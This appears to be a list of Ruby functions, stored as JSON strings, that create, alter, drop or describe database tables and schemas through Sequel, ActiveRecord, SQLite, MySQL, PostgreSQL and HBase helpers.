"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def create_table_from_generator(name, generator, options)\n execute_ddl(create_table_sql(name, generator, options))\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_table_from_generator(name, generator, options)\n drop_statement, create_statements = create_table_sql_list(name, generator, options)\n (execute_ddl(drop_statement) rescue nil) if drop_statement\n create_statements.each{|sql| execute_ddl(sql)}\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def define_table(table_name, columns, force)\n if !db_connection.table_exists?(table_name) || force\n db_connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table(table_name, column_definition = {})\n cols = column_definition.to_a.map { |a| a.join(' ') }.join(', ')\n stmt = %{CREATE TABLE \"#{table_name}\" (#{cols})}\n execute(stmt)\n end",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def create_table_as(name, sql, options)\n sql = sql.sql if sql.is_a?(Sequel::Dataset)\n run(create_table_as_sql(name, sql, options))\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def define_table(table_name, columns, force)\n if !ActiveRecord::Base.connection.table_exists?(table_name) || force\n ActiveRecord::Base.connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table( table_name, options = {}, &block )\n super( table_name, options, &block )\n @connection.schema.load_table( table_name.to_s )\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def create_table(table, options={})\n return send_message(SkyDB::Message::CreateTable.new(table, options))\n end",
"def create_mysql_table name, columns\n sql = \"CREATE TABLE IF NOT EXISTS `#{name.strip}` (\"\n\n for column in columns.split(',')\n sql << \"`#{column.strip}` VARCHAR(500),\"\n end\n\n sql.gsub!(/,$/, '')\n sql << ')'\n\n ActiveRecord::Base.connection.execute(sql)\nend",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def show_create_table(db, table)\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def dump_table_schema(table, options=OPTS)\n gen = dump_table_generator(table, options)\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && !gen.indexes.empty?}) do\\n#{commands.gsub(/^/, ' ')}\\nend\"\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_table(*args, &block)\n apply_translatable_option!(:create_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create_table(table, **kwargs, &block)\n current_instructions << Instructions::CreateTable.new(\n **kwargs,\n table: table,\n columns_block: block,\n )\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_table!(name, &block)\n drop_table(name) rescue nil\n create_table(name, &block)\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def generate_table_def_table()\r\n table_def_name = \"table_definitions\"\r\n\r\n # If the table doesn't already exist, create it\r\n puts \"Creating table definition table (#{table_def_name}) if it doesn't exist.\" if @enable_debug_logging\r\n db_column_size_limits = @db_column_size_limits\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n @db.create_table?(table_def_name.to_sym) do\r\n String :tableName, :primary_key => true, :size => db_column_size_limits[:tableName]\r\n String :kappSlug, :size => db_column_size_limits[:kappSlug]\r\n String :formSlug, :size => db_column_size_limits[:formSlug]\r\n String :formName, :size => db_column_size_limits[:formName]\r\n end\r\n end\r\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(HColumnDescriptor.new(arg))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n @formatter.header()\n @formatter.footer(now)\n end",
"def create_partition_of_table_from_generator(name, generator, options)\n execute_ddl(create_partition_of_table_sql(name, generator, options))\n end",
"def create_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:create_table, self, *args, &block)\n end",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def generate_column_def_table()\r\n table_def_name = \"column_definitions\"\r\n # If the table doesn't already exist, create it\r\n puts \"Creating column definition table (#{table_def_name}) if it doesn't exist.\" if @enable_debug_logging\r\n db_column_size_limits = @db_column_size_limits\r\n @db.transaction(:retry_on => [Sequel::SerializationFailure]) do\r\n @db.create_table?(table_def_name.to_sym) do\r\n String :tableName, :size => db_column_size_limits[:tableName]\r\n String :kappSlug, :size => db_column_size_limits[:kappSlug]\r\n String :formSlug, :size => db_column_size_limits[:formSlug]\r\n String :fieldName, :text => true\r\n String :fieldKey, :size => db_column_size_limits[:fieldKey]\r\n String :columnName, :size => db_column_size_limits[:columnName]\r\n primary_key [:tableName, :columnName]\r\n end\r\n end\r\n end",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create_table(klass)\n fields = fields_for_class(klass)\n\n sql = \"CREATE TABLE #{klass.table} (#{fields.join(', ')}\"\n\n # Create table constraints.\n\n if constraints = klass.ann(:self, :sql_constraint)\n sql << \", #{constraints.join(', ')}\"\n end\n\n # Set the table type (Mysql default, InnoDB, Hash, etc)\n\n if table_type = @options[:table_type]\n sql << \") TYPE = #{table_type};\"\n else\n sql << \")\"\n end\n\n begin\n exec(sql, false)\n info \"Created table #{klass.table}.\"\n rescue Object => ex\n if table_already_exists_exception? ex\n # Don't return yet. Fall trough to also check for the\n # join table.\n else\n handle_sql_exception(ex, sql)\n end\n end\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end",
"def alter_table(name, generator=nil, options=nil, &block)\n if Hash === options\n generator ||= Schema::AlterTableGenerator.new(self, &block)\n\t\t alter_table_sql_list(name, generator.operations, options).\n\t\t flatten.each {|sql| execute_ddl(sql)}\n\t\t remove_cached_schema(name)\n\t\t nil\n else\n\t super(name, generator, &block)\n end\n end",
"def add_select_into_table(new_table_name, sql_query)\n \"CREATE TABLE #{new_table_name} \" + sql_query\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def create_tables!\n migrate(:up)\n end",
"def create_schema(name, opts=OPTS)\n self << create_schema_sql(name, opts)\n end",
"def create_table_with_storing_name(table_name, options = {}, &block)\n @@table_name = table_name\n create_table_without_storing_name table_name, options, &block\n AirBlade::Migrations::SchemaDefinitions.foreign_keys = []\n end",
"def new_table(name, field_defs, encrypt, record_class)\r\n # Header rec consists of last record no. used, delete count, and\r\n # all field names/types. Here, I am inserting the 'recno' field\r\n # at the beginning of the fields.\r\n header_rec = ['000000', '000000', record_class, 'recno:Integer',\r\n field_defs].join('|')\r\n\r\n header_rec = 'Z' + encrypt_str(header_rec) if encrypt\r\n\r\n begin\r\n fptr = open(File.join(@db.path, name.to_s + @db.ext), 'w')\r\n fptr.write(header_rec + \"\\n\")\r\n ensure\r\n fptr.close\r\n end\r\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def dump_table_schema(table, options={})\n table = table.value.to_s if table.is_a?(SQL::Identifier)\n raise(Error, \"must provide table as a Symbol, String, or Sequel::SQL::Identifier\") unless [String, Symbol].any?{|c| table.is_a?(c)}\n s = schema(table).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map{|x| x.first}\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:column_schema_to_generator_opts)\n im = method(:index_to_generator_opts)\n begin\n indexes = indexes(table).sort_by{|k,v| k.to_s} if options[:indexes] != false\n rescue Sequel::NotImplemented\n nil\n end\n gen = Schema::Generator.new(self) do\n s.each{|name, info| send(*m.call(name, info, options))}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))} if indexes\n end\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && indexes && !indexes.empty?}) do\\n#{commands.gsub(/^/o, ' ')}\\nend\"\n end",
"def alter_table_sql_list(table, operations, options=nil)\n\t return super(table, operations) unless Hash===options\n\t \n\t prologue = \"ALTER TABLE #{quote_schema_table(table)} \"\n\t sql = operations.map do |op|\n\t frag = alter_table_sql table, op\n\t raise ArgumentError unless frag.slice![0,prologue.length] == prologue\n\t frag\n\t end\n\t sql.push(table_options_sql(options)).join ' '\n end",
"def create_view_prefix_sql(name, options)\n create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}VIEW #{quote_schema_table(name)}\", options[:columns])\n end",
"def create_table(name)\n if ! db.tables.include?(name.to_sym)\n db.create_table name do\n String :name, :size => 15\n Float :freq\n index :freq\n end\n end\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def create_database(name, options = {})\n options = { :encoding => 'utf8' }.merge!(options.symbolize_keys)\n\n option_string = options.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :collation\n \" LC_COLLATE = '#{value}'\"\n when :ctype\n \" LC_CTYPE = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(:encoding => \"utf8\")\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n \"\"\n end\n end\n\n execute \"CREATE DATABASE #{quote_table_name(name)}#{option_string}\"\n end",
"def create_view_prefix_sql(name, options)\n sql = create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}#{'TEMPORARY 'if options[:temp]}#{'RECURSIVE ' if options[:recursive]}#{'MATERIALIZED ' if options[:materialized]}VIEW #{quote_schema_table(name)}\", options[:columns] || options[:recursive])\n\n if options[:security_invoker]\n sql += \" WITH (security_invoker)\"\n end\n\n if tablespace = options[:tablespace]\n sql += \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n sql\n end",
"def alter_table_sql(table, op)\n quoted_table = quote_identifier(table)\n quoted_name = quote_identifier(op[:name]) if op[:name]\n case op[:op]\n when :add_column\n \"ALTER TABLE #{quoted_table} ADD COLUMN #{column_definition_sql(op)}\"\n when :drop_column\n \"ALTER TABLE #{quoted_table} DROP COLUMN #{quoted_name}\"\n when :rename_column\n \"ALTER TABLE #{quoted_table} RENAME COLUMN #{quoted_name} TO #{quote_identifier(op[:new_name])}\"\n when :set_column_type\n \"ALTER TABLE #{quoted_table} ALTER COLUMN #{quoted_name} TYPE #{op[:type]}\"\n when :set_column_default\n \"ALTER TABLE #{quoted_table} ALTER COLUMN #{quoted_name} SET DEFAULT #{literal(op[:default])}\"\n when :add_index\n index_definition_sql(table, op)\n when :drop_index\n \"DROP INDEX #{default_index_name(table, op[:columns])}\"\n when :add_constraint\n \"ALTER TABLE #{quoted_table} ADD #{constraint_definition_sql(op)}\"\n when :drop_constraint\n \"ALTER TABLE #{quoted_table} DROP CONSTRAINT #{quoted_name}\"\n else\n raise Error, \"Unsupported ALTER TABLE operation\"\n end\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"create_table_migration.rb\", \"db/migrate/create_#{table_name}.rb\"\n end",
"def alter_table_statement(table_name, operations)\n add_line \"alter_table #{table_name.inspect} do\"\n indent do\n operations.compact.each {|op| add_line op }\n end\n add_line \"end\"\n end",
"def create_table\n unless table_exists?\n key_options = connection.internal_string_options_for_primary_key\n\n connection.create_table(table_name, id: false) do |t|\n t.string :key, key_options\n t.string :value\n t.timestamps\n end\n end\n end",
"def create_table\n connection.create_table table_name do |t|\n t.string :record_class_name, :null => false\n t.integer :record_id, :null => false\n t.boolean :is_delete, :null => false, :default => false\n t.datetime :run_at, :null => false\n t.integer :priority, :null => false, :default => 0\n t.integer :lock, :null => true\n t.string :error, :null => true, :limit => 4000\n t.integer :attempts, :null => false, :default => 0\n end\n\n connection.add_index table_name, :record_id\n connection.add_index table_name, [:run_at, :record_class_name, :priority], :name => \"#{table_name}_run_at\"\n end",
"def create_table(name=nil, *field_defs)\r\n raise \"Can't call #create_table from server!\" if server?\r\n\r\n t_struct = Struct.new(:name, :field_defs, :encrypt, :record_class)\r\n t = t_struct.new\r\n t.name = name\r\n t.field_defs = field_defs\r\n t.encrypt = false\r\n t.record_class = 'Struct'\r\n\r\n yield t if block_given?\r\n\r\n raise \"Name must be a symbol!\" unless t.name.is_a?(Symbol)\r\n raise \"No table name specified!\" if t.name.nil?\r\n raise \"No table field definitions specified!\" if t.field_defs.nil?\r\n\r\n # Can't create a table that already exists!\r\n raise \"Table already exists!\" if table_exists?(t.name)\r\n\r\n raise 'Must have a field type for each field name' \\\r\n unless t.field_defs.size.remainder(2) == 0\r\n\r\n # Check to make sure there are no duplicate field names.\r\n temp_field_names = []\r\n (0...t.field_defs.size).step(2) do |x|\r\n temp_field_names << t.field_defs[x]\r\n end\r\n raise 'Duplicate field names are not allowed!' unless \\\r\n temp_field_names == temp_field_names.uniq\r\n \r\n temp_field_defs = []\r\n (0...t.field_defs.size).step(2) do |x|\r\n temp_field_defs << build_header_field_string(t.field_defs[x],\r\n t.field_defs[x+1])\r\n end\r\n\r\n @engine.new_table(t.name, temp_field_defs, t.encrypt,\r\n t.record_class.to_s)\r\n\r\n return get_table(t.name)\r\n end",
"def create_table!\n return true unless Fathom.config.uses_sqlite_optimizer\n value = Fathom.config.db.execute(table_creation_sql)\n end",
"def get_ddl(cfg)\n <<-EOS\n CREATE TABLE operations (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(100) NOT NULL,\n txid VARCHAR(100) NOT NULL,\n amount DECIMAL(16,8) NOT NULL,\n block_height INTEGER NOT NULL,\n block_hash VARCHAR(100) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`),\n KEY `idx_txid` (`txid`),\n UNIQUE KEY `idx_address_txid` (`address`, `txid`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n CREATE TABLE addresses (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(255) DEFAULT NULL,\n total_received DECIMAL(16,8) DEFAULT NULL,\n balance DECIMAL(16,9) DEFAULT NULL,\n n_tx INTEGER NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n EOS\n end",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def create_migration_file\n return unless options[:migration] && options[:parent].nil?\n attributes.each { |a| a.attr_options.delete(:index) if a.reference? && !a.has_index? } if options[:indexes] == false\n migration_template \"../../migration/templates/create_table_migration.rb\", File.join(db_migrate_path, \"create_#{table_name}.rb\")\n end",
"def sqlite3_create_tb(table_name, columns, primary_key, if_not_exist)\n if if_not_exist.downcase == \"n\"\n status = @dbm.table_exist?(table_name)\n @assert.table_already_exist(status, table_name, @dbh)\n end \n\n # Retrieve only the column names\n col_names = columns[0].keys\n\n table_spec_str = '('\n # col: Column name\n # columns[0][col][0]: Column type\n # columns[1][col][1]: Column nullable\n col_names.each {|col|\n col_type = columns[0][col][0]\n @assert.check_type(col_type)\n if col == primary_key\n table_spec_str.concat(\"#{col} #{col_type} PRIMARY KEY NOT NULL,\")\n else\n if columns[0][col][1].downcase == \"no\"\n table_spec_str.concat(\"#{col} #{col_type} NOT NULL,\")\n else\n table_spec_str.concat(\"#{col} #{col_type},\")\n end\n end\n }\n table_spec_str.chomp!(',')\n table_spec_str.concat(')')\n \n create_query = \"CREATE TABLE IF NOT EXISTS #{table_name} #{table_spec_str};\"\n @dbh.execute(create_query)\n\n return create_query + \"\\n\"\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def create_table_with_inherits(table_name, options = {}, &block)\n options[:primary_key] = \"#{options[:inherits]}_id\" if options[:inherits]\n\n create_table_without_inherits(table_name, options) do |table_defintion|\n yield table_defintion \n end \n end",
